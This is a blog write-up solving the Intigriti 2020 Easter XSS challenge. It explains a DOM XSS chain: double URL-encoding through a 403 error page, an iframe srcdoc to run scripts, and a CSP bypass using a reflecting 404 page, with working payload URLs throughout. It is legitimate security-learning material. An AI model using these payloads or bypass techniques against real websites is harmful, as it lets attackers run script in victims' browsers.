Intigriti XSS Easter Challenge 2020: Pwning the DOM with 404’s

On the 13th of April 2020, Intigriti released their XSS challenge for Easter. When I saw the tweet, I knew I had to give it a go. I already had some experience with their previous challenges, but never managed to put in the extra effort to complete it. This time, I was dedicated.

You should know that I am not an XSS guru, by far. When I’m testing for XSS, I mostly keep it with simple payloads. I had put a lot of effort in this challenge. I’ve learned so much along the way, and it also gave me ideas for new XSS payloads for my future bug bounty ventures. I have absolutely no regrets that I’ve spend multiple hours on this challenge!

This blog post will serve as an in-depth technical walkthrough on how to solve this challenge. I did my best on explaining as much as possible on the technical stuff as well as my thought process, in (hopefully) a correct way. I hope that you can gain more knowledge from this blog post and that it may help you in your future bug bounty endeavors. I hope you have a good read!

The challenge

The goal was (obviously) to find the DOM-based XSS in the web application, and exploit it with an alert(document.domain) payload. The challenge could be found at https://challenge.intigriti.io and the rules were very clear:

  • XSS should work on the latest version of Firefox and Chrome
  • Should bypass Content-Security Policy (CSP)
  • Should execute alert(document.domain)
  • Should execute on the same page, on the same domain
  • No self-XSS or Man-in-the-Middle (MitM)

The web page had the following layout. Take note of the drop-down list.

If we take a look at the source, we could see the following relevant HTML code. Notice how we have various options for the drop-down list that are shown.

<!DOCTYPE html>
<html>
<head>
  <title>Easter XSS Challenge - Intigriti</title>
</head>
<body>
[...]
  <div id="reason-container">
    <select id="reasons">
      <option value="">-- select a reason --</option>
      <option value="1">Get rewarded on your terms</option>
      <option value="2">Match your skills</option>
      <option value="3">Connect with your peers</option>
      <option value="4">Do what you love</option>
      <option value="5">Seamless payments</option>
      <option value="6">Easy communication</option>
    </select>
    <div id="reason">
    </div>
  </div>
  <script src="script.js"></script>
</body>
</html>

And finally, we have our script.js file, that handles displaying the correct text for each of our various reasons.

var hash = document.location.hash.substr(1);
if(hash){
  displayReason(hash);
}
document.getElementById("reasons").onchange = function(e){
  if(e.target.value != "")
    displayReason(e.target.value);
}
function reasonLoaded () {
    var reason = document.getElementById("reason");
    reason.innerHTML = unescape(this.responseText);
}
function displayReason(reason){
  window.location.hash = reason;
  var xhr = new XMLHttpRequest();
  xhr.addEventListener("load", reasonLoaded);
  xhr.open("GET",`./reasons/${reason}.txt`);
  xhr.send();
}

Notice when we select an option from the drop-down list that our fragment in our URL changes to a number. This is because the JavaScript code is grabbing the contents for the selected reason from a text file, and the filename is the value of our selected option, ending with .txt. That number will be reflected back in our URL. Let’s take a deeper look into the code to see what it does in more detail.

Breaking down the JS code

First of all, we can see that a variable called hash is set, which contains the value after the fragment (#) of the URL. This will be the number of the selected option.

var hash = document.location.hash.substr(1);

Next, a check happens if the hash variable already contains a value. If so, the code will jump to the displayReason() function. Then, we can see an onchange event handler for the element with an id attribute of “reasons”. So when another option is picked from the drop-down list and that value is not empty, the code will also jump to the displayReason() function, with the value of the selected option.

if(hash){
  displayReason(hash);
}
document.getElementById("reasons").onchange = function(e){
  if(e.target.value != "")
    displayReason(e.target.value);
}

Skipping to the last function, which is displayReason(), handles loading the correct reason. It has a parameter called reason, which will contain our value from the hash variable. The function will first of all set the reason value back in the fragment of the URL. Next, it creates an XMLHttpRequest object and adds an event listener to it. This event listener will trigger on the load event, meaning that when the XHR request is finished, the function reasonLoaded() is called. Finally, the XHR object calls the GET ./reasons/${reason}.txt endpoint, where ${reason} is a string substitute for our value stored in the reason argument.

function displayReason(reason){
  window.location.hash = reason;
  var xhr = new XMLHttpRequest();
  xhr.addEventListener("load", reasonLoaded);
  xhr.open("GET",`./reasons/${reason}.txt`);
  xhr.send();
}

There are other XHR event listeners as well. Looking at the MDN documentation on XMLHttpRequest, we can see the following event listeners:

  • load – The HTTP request is completed and all data is in the response
  • progress – The amount of data that has been retrieved, has changed
  • error – When an error occurred during the transfer
  • abort – When the user has canceled the transfer

Now, looking back at reasonLoaded(), this function is responsible for loading the unescaped response text inside the HTML element with the id of “reason”. When we look at our HTML source code, we can see that this is a simple <div> on line 18. Notice that the unescape() function is called on the this.responseText value, which refers back to the xhr object that was created in the displayReason() function. Also note that this value is inserted with the .innerHTML property, meaning that markup language is inserted as well. This will play a key role for our injection later on.

function reasonLoaded () {
    var reason = document.getElementById("reason");
    reason.innerHTML = unescape(this.responseText);
}

If we look up the unescape() function, it tells us the following:

The unescape() function computes a new string in which hexadecimal escape sequences are replaced with the character that it represents.

So what it does in simple terms: it URL-decodes the string that is passed to this function. Now that we have an understanding of what the JavaScript code is doing, we can start looking for vulnerabilities.

Gaining HTML injection

If we tried to enter a value in the fragment of the URL that was not a number, we observed the following behavior.

https://challenge.intigriti.io/#test

A 404 error message appears before us. Remember that a call is happening to an endpoint in the background that tries to grab the correct text file for our selected reason. The JS code is now trying to call ./reasons/test.txt, which does not exist. Interestingly, we actually receive an HTTP status code of 200 when we call this endpoint, as can be seen in our developer console. It’s not really a 404. 🙂

The interesting part is that our entered value is reflected back in the error message. Take note of this behavior.

The obvious thing to do next is to see if we can enter HTML tags in the fragment of the URL, and see if they would render in the browser.

https://challenge.intigriti.io/#%3Ch1%3Epwnd

Sadly for us, we didn’t pwn the app, as our angle brackets got URL-encoded and percentages were replaced with underscores (_). This can also be seen in the DOM with the inspector tool.

The question now arises: how do we bypass this encoding issue? It’s only a matter of logical thinking in this case. We know for a fact that when we enter a filename that does not exist on the web server, we will receive a “404” error. But, what about other errors? Do they apply the same encoding protections as the 404 error?

Think about it, there are various other error messages that can be thrown by a web server. For example:

  • 400 – Bad Request
  • 401 – Unauthorized
  • 403 – Forbidden
  • 404 – Not Found
  • 500 – Internal Server Error
  • etc.

Let’s see how we can trigger one of these errors, if possible. A 400 Bad Request is simply thrown when we provide a single percentage (%) character in the URL, like this.

https://challenge.intigriti.io/%

This is actually a legitimate 400 error message thrown by the Apache service. The problem is that this error message does not reflect back our inserted string. Which is normal, since Apache was not able to correctly handle the request, and therefore throws a general error message at you.

Forcing a 401 is somewhat unlikely in this case, as there is no portion of the web app that requires authentication. I also wasn’t able to generate a 500 error. We have already proven our 404 error message, so that leaves us with one more viable option: the 403 forbidden.

There are certain files that, when we try to request them from a web server, almost always triggers a 403. This happens a lot with hidden files. A hidden file starts with a dot (.), and are supposed to be hidden because they commonly contain sensitive information. A good example is the .htaccess file. Let’s see what happens when we attempt to request this file.

https://challenge.intigriti.io/.htaccess

We now have found another error message that reflects our requested filename back in the browser. Let’s see how this behaves when we request this on the challenge page.

https://challenge.intigriti.io/#/.htaccess%3ch1%3epwnd

This time, there seems to be no encoding applied. However, our angle brackets were not rendered as HTML tags inside the browser. Let’s take a look at the DOM to analyze this behavior.

We can see that the error message itself is enclosed in <p> tags, but our <h1> tag did not render. This might perhaps happen because the web application is attempting to URL-decode any URL-encoded values in the URL, and render them safely in the browser. It might not seem like it, but we are actually entering the URL-encoded values of our angle brackets, which are %3C (<) and %3E (>). The browser simply decodes these values in the URL for us, but looks can be deceiving after all.

If the web application does not recursively check for URL-encoded values in the URL, we might be able to apply a double URL-encoding scheme. Let’s try entering %253C and %253E, which also encodes the percentage character to its URL-encoded value. This is %25. Let’s see what happens when we enter the following string.

https://challenge.intigriti.io/#/.htaccess%253ch1%253epwnd

Lo and behold, the <h1> rendered successfully in our browser and we have a successful HTML injection. Pack up your things, we’re ready here. Let’s inject an XSS payload and call it a day! That was my initial thought, little did I know what was awaiting me…

Inspecting the DOM shows us indeed that our <h1> tags were rendered by the browser. We are not even required to entering closing tags. This is behavior of the .innerHTML property, as it would automatically create closing tags for certain HTML tags.

So, let’s attempt to inject <script> tags, trigger an alert() message box and call it a day. In this case, we need to provide closing tags ourselves since the .innerHTML property does not take care of script tags.

https://challenge.intigriti.io/#.htaccess%253cscript%253ealert(1);%253c/script%253e

What? No alert message? Why? Let’s inspect the DOM and see what has happened.

We can see a correct injection of our <script> tag, but it didn’t trigger the alert() payload. Okay, this is fine. Let’s attempt to trigger an XSS by using an event handler, like <img src=x onerror=alert(1)>, that should do it.

https://challenge.intigriti.io/#.htaccess%253cimg%20src=x%20onerror=alert(1)%20/%253e

Again, no alert. Inspecting the DOM shows us again that the <img> tag was successfully injected, and should trigger our payload.

However, we can actually confirm that it should work. If we check the Console tab in our developer console, we can see something peculiar.

It seems that there is a Content-Security Policy blocking our JavaScript. The error message shows us that it was blocked by the default-src policy. Let’s see how this CSP is exactly configured.

Looking at the response headers of our request, we can see that the default-src 'self' policy is in place, which is quite strict. This basically means that we can only load JavaScript from the same origin, and that inline JavaScript is prohibited. We will go deeper into CSP later on.

It seems that we currently have same road blocks ahead of us, as we are not simply able to trigger our JS payload.

Overcoming obstacles

We currently know that we are able to inject HTML code inside the web page, but we stumbled on two problems:

  • We need to find a way to successfully execute JavaScript, through our HTML injection.
  • We need to bypass the strict CSP policy that is in place.

Because of the CSP that is in place, we know that we can’t make use of the following options:

  • External JS scripts
  • Inline JavaScript
    • Event handler attributes (e.g. onerror)
    • javascript: protocol

With this information in the back of our minds, let’s start researching our options.

JS Execution

We already tried to inject <script> tags earlier, but this didn’t work. I didn’t explain to you yet why this doesn’t work. This tag is still a viable option, since it has a src attribute, which might allow us to somehow load JavaScript that comes from the same origin. But I’m getting ahead of myself now.

When the web page is loaded by the browser, the DOM is build and every <script> tag that is found will be executed, if it originates from the same origin. The <script src="script.js"></script> code, inside the HTML source code, fulfills this requirement and is therefore loaded by the browser. It will grab the file, parse the JavaScript inside and execute it.

When we do our HTML injection through the fragment in the URL, the script.js file is making use of the .innerHTML property to insert our code into the DOM. However, because the DOM is already built, the injected <script> tags will not be loaded by the browser. Therefore, it will never execute, even if it comes from the same origin.

You can simply test this yourself with the following HTML code:

<!DOCTYPE html>
<html>
<head>
	<title></title>
</head>
<body>
	<h2>Result:</h2>
	<div id="reason"></div>
	<script>
		var hash = document.location.hash.substr(1);
		var reason = document.getElementById("reason");
		reason.innerHTML = unescape(hash);
	</script>
</body>
</html>

Let’s attempt to inject an external JS file that pops an alert message. I have an xss.js file already hosted on my domain, that pops an alert(document.domain).

Even though that there is no CSP applied on the local file, we can clearly see that our JavaScript does not execute. The <script> tags are added after the DOM has been built, and is therefore not loaded by the browser. If you analyze the Network tab in the developer console, you will also see that the browser will not retrieve the external JS file.

If we cannot load JavaScript with the <script> tags in the current page, what other options do we have? Which HTML tags can still be used to successfully execute JavaScript?

After some research, I learned that the <iframe> tag has a srcdoc attribute, which can be used in this situation. An iframe will work here because it acts as a new browser window, meaning that the DOM will be build again for the code that’s inside the iframe, even after we inject it through .innerHTML. The srcdoc attribute allows us to inject our own HTML code inside the iframe, rather than referring to another web page with the src attribute. This provides us the option to work with <script> tags again if we use them in combination with the srcdoc attribute.

Going back to our previous example, let’s now attempt to inject our <script> tags inside an <iframe> by using the srcdoc attribute, and see what happens.

This time, our JavaScript code did execute. There is no output in our alert box because we tried to execute document.domain, and we are working with a local file here. If we now inspect the DOM, we can see the following.

The <iframe> tag is rendered by the .innerHTML property. Then, the iframe injects the <script> tag that is stored inside the srcdoc attribute and is placed inside the <head> tag of the iframe. Finally, the DOM is build for the iframe and the JavaScript code inside our injected JS file gets executed.

We now have found a viable option to reliably inject JavaScript code with <script> tags with the help of an <iframe>. Now, let’s see how we can deal with the CSP protection.

CSP Bypass

Let’s take a step back first and explain what the Content-Security Policy response header actually is.

The HTTP Content-Security-Policy response header allows web site administrators to control resources the user agent is allowed to load for a given page. With a few exceptions, policies mostly involve specifying server origins and script endpoints. This helps guard against cross-site scripting attacks (XSS).

In simple terms: it is being used to block certain resources from loading and is mostly used to prevent XSS-attacks. The CSP header is being used to tell the browser what content it is allowed to load an what not.

There are many Policy Fetch directives that can be used by the CSP header. Some example are:

  • img-src – specifies valid sources of images and favicons
  • script-src – specifices valid sources for JavaScript
  • style-src – specifies valid sources for stylesheets
  • etc.

There are many more directives available. Documentation is available on MDN.

As we’ve already seen, we’re working with a default-src 'self' policy. The default-src directive acts as a fallback for all other undefined directives. In this case, it is applied for each fetch directive.

The self value represents the source for the directive, it tells us what sources we are able to load. Looking at the MDN documentation for self, it shows us the following definition:

‘self’: Refers to the origin from which the protected document is being served, including the same URL scheme and port number.

There are other sources as well, but I suggest that you take a look at the documentation and read them for yourself.

Now that we understand what the scope is of our CSP policy, we need to find a way to load JavaScript from the same origin, and trigger an alert(document.domain). However, we can see that only the script.js file is available on this domain, and this file does not contain the JS code that we require. So, what are our options? How can we load valid JavaScript that originates from the same origin?

Remember the 404 error that reflected our requested filename?

https://challenge.intigriti.io/idontexist

This error message does not contain any markup language, it is simply plain text that is being displayed.

view-source:https://challenge.intigriti.io/idontexist

What if we can inject a string that, when carefully crafted, allows us to convert this string into valid JavaScript code and then load it in as a source for our <script> tag? It would then originate from the same origin, allowing us to bypass the CSP protection.

Let’s go back to our local PoC file and use this string as JavaScript code.

<!DOCTYPE html>
<html>
<head>
	<title></title>
</head>
<body>
	<script>404 - 'File "idontexist" was not found in this folder.'</script>
</body>
</html>

This JS code will obviously not work for our purpose. However, it can still be interpreted as valid JavaScript. If you observe closely, a subtraction is happening between an integer and a string, which will result in NaN.

However, what if we have the following text as our JavaScript code?

404 - 'File "';alert(1);'" was not found in this folder.'

When we close both strings with single quotes (‘) and use two semicolon (;) delimiters to separate our JS code, we can successfully gain JavaScript execution. We can see that the DOM now looks like the following in our PoC.

This confirms that we can achieve our DOM XSS by using ‘;alert(1);’ as our source file for our <script> tag. This can be confirmed by requesting said string as a file, and see if the web application spits out the exact string as we have used in our PoC.

https://challenge.intigriti.io/’;alert(1);’

Good. This confirms that we can use this string as our payload. Now, let’s see when we try to request this on the challenge page itself.

https://challenge.intigriti.io/#.htaccess%253ciframe%20srcdoc=’%3Cscript%20src=/’alert(1);’%3E%3C/script%3E’%253e%253c/iframe%253e

Strange. It seems like we have entered a correct payload, but there is no alert message. Why? Again, let’s investigate the DOM to see where things went wrong.

It turns out that our payload got all mangled up. This is behavior of the .innerHTML property that attempts to place strings inside attributes. As you can see, we have some spacing issues that need to be resolved before the payload will work.

Spacing

The goal is to actually create a srcdoc payload that does not contain any spaces, and that stays in place after .innerHTML has parsed the fragment of the URL. Notice how we have a space at <script src="...", this actually breaks our payload as it needs to stay a part of the srcdoc attribute. But because of the space, .innerHTML thinks that the string after the space is the start of a new attribute.

To fix this, we can easily replace the space with a /. This would give us the following string: <script/src="...". Notice that we also can leave out the quotes for the src attribute, which makes things also easier. With this method, no spaces exist in our payload.

Triggering the XSS

After fixing the spacing issue, we have come up with the following payload string.

https://challenge.intigriti.io/#/.ht%253ciframe%20srcdoc=%3Cscript/src=/';alert(document.domain);'%3E%3C/script%3E%20%253e%253c/iframe%253e

We create an <iframe> with a srcdoc attribute containing our <script> payload that fulfills the CSP requirements and does not contain any spaces. The iframe loads in our code, the DOM is build for the iframe window and the <script> tag gets executed.

And now, our XSS finally gets executed correctly.

If we have a final look at the DOM, we can indeed see that our payload got parsed correctly by the .innerHTML property, and that our <script> tag is correctly inserted inside the <head> tag of the iframe.

Conclusion

In this challenge, we were able to bypass the URL-encoding protection and gain HTML injection by leveraging a 403 Forbidden instead of a 404 Not Found.

Next, we discovered that <script> tags are not loaded when injected through .innerHTML, as the DOM is already built by then. But they can still be executed when leveraged in combination with the srcdoc attribute of an <iframe>.

Afterwards, we found a bypass for the CSP protection by leveraging a content injection vulnerability in the 404 error, and reflect back valid JavaScript inside the error message which could be used as a source for the <script> tag, as the error message originated from the same domain.

Finally, we fixed the spacing issue within our srcdoc attribute, so that .innerHTML handled the complete string inside this attribute as its value, allowing us to execute our XSS payload successfully.

Final words

During this challenge, I did a tremendous amount of research and learned so much along the way. It gave me new insights on how to tackle potential XSS vulnerabilities in the future. When you read this blog post, do not think that it was an easy task for me to discover this. Hours of research went into this challenge and there were a lot of frustrations along the way, where I didn’t see the solution and I almost decided to gave up on this challenge.

During penetration tests or bug bounty hunting, you will most likely also come across frustrations if you cannot exploit a potential vulnerability. It’s all about being determined and thinking positively: “You CAN exploit this”. Put in the extra effort and don’t give up, in any situation. And I promise you, the satisfaction is so worth it afterwards if you see that alert on your screen, pop that shell, etc.

I hope that you’ve enjoyed this (rather long) read, and that you’ve learning something extra from it.

Happy hacking!